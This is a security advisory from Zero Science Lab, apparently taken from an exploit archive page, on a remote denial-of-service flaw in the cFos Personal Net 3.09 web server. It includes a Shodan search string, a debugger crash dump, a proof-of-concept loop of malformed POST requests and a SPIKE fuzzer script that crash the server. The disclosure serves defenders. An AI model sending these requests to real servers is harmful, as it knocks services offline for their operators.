163 lines
No EOL
8 KiB
Text
163 lines
No EOL
8 KiB
Text
cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service
|
|
|
|
|
|
Vendor: cFos Software GmbH
|
|
Product web page: https://www.cfos.de
|
|
Affected version: 3.09
|
|
|
|
Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
|
|
personal and professional use. For personal use, instead of hosting websites
|
|
with a webhoster, you just run it on your Windows machine. For professional
|
|
use, you rent a virtual windows PC or dedicated PC from a webhoster and run
|
|
it there.
|
|
|
|
Desc: cFos Personal Net web server is vulnerable to a remote denial of service
|
|
issue when processing multiple malformed POST requests in less than 3000ms.
|
|
The issue occurs when the application fails to handle the data sent in the
|
|
POST requests in a single socket connection causing heap memory corruption
|
|
which results in a crash of the HTTP service.
|
|
|
|
SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0
|
|
|
|
============================================================================
|
|
|
|
(658.1448): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
|
|
eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
|
|
eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0 nv up ei pl zr na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
|
|
cfospnet+0x54529:
|
|
00914529 ff5004 call dword ptr [eax+4] ds:002b:feeefef2=????????
|
|
0:024> d ecx
|
|
02813dcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813ddc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813dec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813dfc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e3c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0:024> d
|
|
02813e4c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e5c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e6c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e7c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e8c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813e9c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813eac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813ebc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0:024> d
|
|
02813ecc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813edc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813eec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813efc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813f0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813f1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813f2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813f3c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.!
|
|
0:024> d
|
|
02813f4c 8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04 .....q-......q-.
|
|
02813f5c 01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48 ...._CFPNET_PATH
|
|
02813f6c 00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04 .............A,.
|
|
02813f7c 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00 ............)...
|
|
02813f8c 2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 /...............
|
|
02813f9c 00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04 .....f.8.....1,.
|
|
02813fac d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813fbc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0:024> d
|
|
02813fcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813fdc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813fec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
02813ffc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281400c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281401c ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f .............f./
|
|
0281402c c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00 ........n.a.m.e.
|
|
0281403c 3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 =...............
|
|
0:024> d
|
|
0281404c 00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02 .....f."....`...
|
|
0281405c 10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe ..+.............
|
|
0281406c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281407c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281408c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281409c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.!
|
|
028140ac dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02 ........07...K..
|
|
028140bc 00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00 ....REQUEST_URI.
|
|
0:024> d
|
|
028140cc 0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02 .............A..
|
|
028140dc 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00 ................
|
|
028140ec 1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 ................
|
|
028140fc 00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72 .....f.-..../scr
|
|
0281410c 69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f ipts/get_server_
|
|
0281411c 73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab stats.jss.......
|
|
0281412c ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f .............f.?
|
|
0281413c d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe .....J,...-.....
|
|
0:024> d
|
|
0281414c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281415c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281416c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281417c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281418c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0281419c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
028141ac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
028141bc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
|
|
0:024> d esi
|
|
028198b0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
028198c0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
028198d0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
028198e0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
028198f0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
02819900 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
02819910 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
02819920 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
|
|
|
|
============================================================================
|
|
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2014-5184
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php
|
|
|
|
|
|
01.04.2014
|
|
|
|
---
|
|
|
|
|
|
-ALGjlang
|
|
|
|
open_socket(); for(j=1;j<=30;j++)
|
|
{
|
|
send_socket("
|
|
POST /scripts/get_server_stats.jss?name= HTTP/1.1
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
|
Accept: */*
|
|
Host: 192.168.0.107
|
|
Content-Length: 20
|
|
|
|
AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
|
|
") } close_socket();
|
|
|
|
|
|
-SPKfzz
|
|
|
|
s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
|
|
s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
|
|
s_string("Accept: */*");
|
|
s_string("Host: 192.168.0.107\r\n");
|
|
s_string("Content-Length: ");
|
|
s_blocksize_string("fuzz",15);
|
|
s_string("\r\n\r\n");
|
|
|
|
s_block_start("fuzz");
|
|
s_string("joxypoxyjoxypoxy!!\r\n\" * 100);
|
|
s_string_variable("ZSL");
|
|
s_string("\r\n"); //importante
|
|
s_block_end("fuzz"); |